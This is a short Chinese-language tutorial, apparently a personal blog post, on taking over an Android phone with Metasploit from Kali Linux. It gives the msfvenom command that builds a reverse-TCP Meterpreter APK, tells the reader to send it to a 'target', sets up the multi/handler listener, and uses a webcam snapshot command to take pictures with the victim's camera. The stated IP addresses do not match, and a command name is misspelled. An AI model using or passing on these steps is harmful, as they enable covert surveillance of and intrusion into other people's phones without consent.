MSF入侵安卓手机,
最近本姑娘闲来无事玩了玩kali ,发现了msf的开启摄像头功能,吓得本姑娘以后在也不敢在睡觉前玩手机了。
以下是步骤:
1、打开电脑,我用的是kali虚拟机做测试,当然用服务器操作亦然相同
查看ip,假设是192.168.1.1
2、在kali里面生成文件,生成的是一个apk.apk的安装文件,路径在root目录下,复制该文件,发送给目标
命令为:msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.7 LPORT=5555 R > /root/apk.apk
3、手机上安装apk.apk文件,然后桌面上显示main activity
4、打开msf:
1. use exploit/multi/handler 加载模块
2.set payload android/meterpreter/reverse_tcp 选择Payload
3.show options 查看参数设置
5、设置自己网络ip以及端口,手机点击病毒,即可抓取摄像头:
6、获得截图,截图保存在root文件夹下
webscam_snap -i 1:外置摄像头;2:内置摄像头